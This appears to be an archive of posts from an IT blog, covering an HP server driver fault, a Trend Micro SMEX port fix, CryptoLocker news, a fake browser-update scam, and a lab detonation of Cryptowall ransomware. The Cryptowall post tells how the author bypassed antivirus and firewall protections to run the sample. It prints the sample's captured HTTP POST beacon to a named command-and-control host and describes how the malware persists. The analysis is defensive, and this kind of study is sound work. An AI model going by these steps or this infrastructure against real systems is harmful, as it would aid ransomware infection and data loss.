Archive for category IT
The failure happens about 45 minutes into the install so each new attempt takes ages to get to the point of failure.
After 5 or 6 hours of messing about, we called on HP. After their attempts to remote in via iLo and their own firmware checks (and under the hood checks) it was still nto installing Windows.
They spent days on it. Finally, we descided to call time on this adventure. We wasted too much time. We insisted it must be the mainboard.
The HP tech turned up and he started his own tests. He also found that it was a driver fault and after digging, worked out that the broadbom network driver was halting everything.
After another 5 or so hours, he finally replaced the motherboard. now it is all fixesd.
His conclusion is that the older firmware on the mainboard (intelligent Provisioning version 1.15) was more accepting of the Broadcom card and allowed everything to work.
So, if anyone strikes this same issue here are my conclusions
1) Call HP carepack team sooner rather than later. They are paid to fix these things and have the resources.
2) Newer firmware does not mean better
3) Get HP to do as much of the work as possible whilst it is under Carepack as this cost us dearly.
I can’t get into the Antivirus or antispam settings and the agent appears to be offline?
As this console normally opens up http://ExchangeServer:16372/smex/cgiDispatcher.exe?Page=scan/Antispam.htm&Locale=&CurPage=
My first step was to telnet to the Exchange server on port 16372 and, it did not answer.
As Smex runs from within a web server (in my case IIS), I looked at the default website and it was not running on port 16372. The port that it was running on did not match the firewall rule.
This means the smex service could not bind to a port when the service starts and as this port did not match the console, I had no hopes of connecting to it.
I change the port in IIS and the firewall rule. Restarted the website and … all fixed !
The news is that some smart people have managed to obtain a copy of the database that contains all the Victim’s details. Now, instead of paying for decryption, you can get the decryption for free, self service.
Head on over to this article to read more: http://www.crn.com.au/News/390855,can-this-exploit-beat-cryptolocker.aspx
I don’t think we have seen the end of these types of Malware but at least this proves that the Malware writers are not invincible.
Being an IT guy, I know I already have the latest version. I also note that the URL is not a Microsoft URL. The Terms have some odd bits in it.
For all the non IT people out there …… Use Windows Updates. If you want to update your browser, find it on Microsoft’s website and install it yourself. Don’t follow prompts like this (no matter how convincing it looks).
So, this looks like Microsoft .. Right ?
You are currently browsing the web with Internet Explorer and your Video Player might be outdated Please update to the latest version for better performance •Superior HD Video Streaming and Hardware Acceleration •Download Any Movies, Shows or Video Clips •Critical Security Patch and Bug Fixes •Richer, more immersive user experiences Note:This Update is Free and Takes Under a Minute on Broadband No Restart Required
Looks ok. I have never seen a browser update take less than a minute on most broadband. Since when does Microsoft support you downloading movies ? Hmm, looks suspicious.
The URL also looks odd.
What’s up with this section in the terms ?
But no one reads the terms do they ? I noticed that nowhere does it mention Microsoft. It just talks about your browser.
The last line of the terms is also odd. The only place where you might make contact with the software maker, has no hyperlinks or contact details.
If you would like to contact us via e-mail, please send a message here
So avoid this and don’t be tricked.
Here are the full terms
Think before you click !
No, I have a lab setup with a DMZ and loads of protection. I just need to download and run Cryptowall as my final step. My setup includes some sample data to encrypt, wireshark for packet sniffing and Sysinternals Process Monitor.
So, let the fun begin. Thanks to the antivirus companies out there (Trend Micro etc) this is harder than I thought. I also had to dumb down my Sonicwall firewall to let viruses through. The antivirus companies have been taking down the virus URL’s faster than I can check them. It took ages to locate and download the Document-128_712.zip file. Awesome to see the AV companies are on top of their game.
So I had to bypass the built in Internet Explorer protection (It also wanted to kill my download) and finally I have Document-128_712.zip. I extracted out the contents. Document-128_712.scr with a PDF icon. I double click the screensaver file (Executable in disguise) and the file vanished. The mouse moves to an hourglass for a second and then nothing. I refer to the wireshark and process monitor. They are blitzing past recording data.
There is nothing at the desktop to indicate what is happening (except the hard disk light flashing). If I had been caught by this, I might be tempted to double click it again and again as nothing appears to happen.
As this thing encrypts alphabetically, I wait until I start seeing the signs of the encryption appearing in the hard drive sub folders and then I created a folder called “a” as in C:\a. It is safe as the process does not seem to double back once it has passed a letter of he alphabet. A nice place to save logs etc. So, here come the screenshots. Some from this current experiment, some from an actual infection.
So here is the Scr file, renamed into bd99547.exe. Is is the same file as Document-128_712.scr as the hashes are the same. It is in the startup group so it you restart your pc, it continues to encrypt.
Now showing all hidden files on the C:\ drive, I find a hidden folder with the same exe file in it.
So I let this thing continue on and do it’s job. The file exe file located in the startup startmenu category and on C:\ will vanish later. I watch as Process Monitor shows me the “exe” file I ran, using Windows built in cryptography to encrypt everything. I note that the malware does not need to download anything from the internet. Microsoft have already provided everything it needs. It is using Microsofts own tools to hold us ransom.
I watch it connect to 126.96.36.199 and do a HTTP post. This server is called babyslutsnil.com
POST /da2c5yzx438 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0; .NET4.0E)
z=109a242f761c53dbf5fa7883a817baff7b6f70eec0b2c20b9c59a99d5e6ddcb49ed56d8d6082a4df4909c8600c5850ad16HTTP/1.1 500 Internal Privoxy Error
Date: Sun, 29 Jun 2014 23:41:14 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Sun, 29 Jun 2014 23:41:14 GMT
Expires: Sat, 17 Jun 2000 12:00:00 GMT
title 500 Internal Privoxy Error /title
link rel=”shortcut icon” href=”http://config.privoxy.org/error-favicon.ico” type=”image/x-icon”> /head
h1 500 Internal Privoxy Error /h1
pPrivoxy encountered an error while processing your request:/p
pbCould not load template file codeforwarding-failed/code or one of its included components./b/p
p Please contact your proxy administrator./p
p If you are the proxy administrator, please put the required file(s)in the code i (confdir) /i /templates /code directory. The location of the code i (confdir) /i /code directory is specified in the main Privoxy code>config/code file. (It’s typically the Privoxy install directory, or code/etc/privoxy//code)./p
I can only assume it is trying to send out the RSA encryption key to the remote server.
Then you start seeing the encrypted files in folders with additional files (DECRYPT_INSTRUCTION).
Then you find a key in the registry which starts off the same as the exe file name
and then the exe’s start to vanish and are replaced with the warnings you will see next reboot.
Then you get invited to go up, pay some money, download another exe file (Do you trust it?) with the decryption and away you go !
It uses the TOR network for the website so there is no way to track these guys. They are annonymous and invisable.
Now the trick is to get these files and screen shots from “C:\a” onto my USB key, as when I plug it in, the files get encrypted.
Final step, FORMAT THE MACHINE. My packet Sniffs and Process monitoring has shown me that this Malware gets all over your PC.
Don’t fix it, reformat it. You can recover files from Backups or Volume Shadow copy but the underlying OS is now owned by some remote hacker. Don’t dice with death!
Moral: Have offline current backups !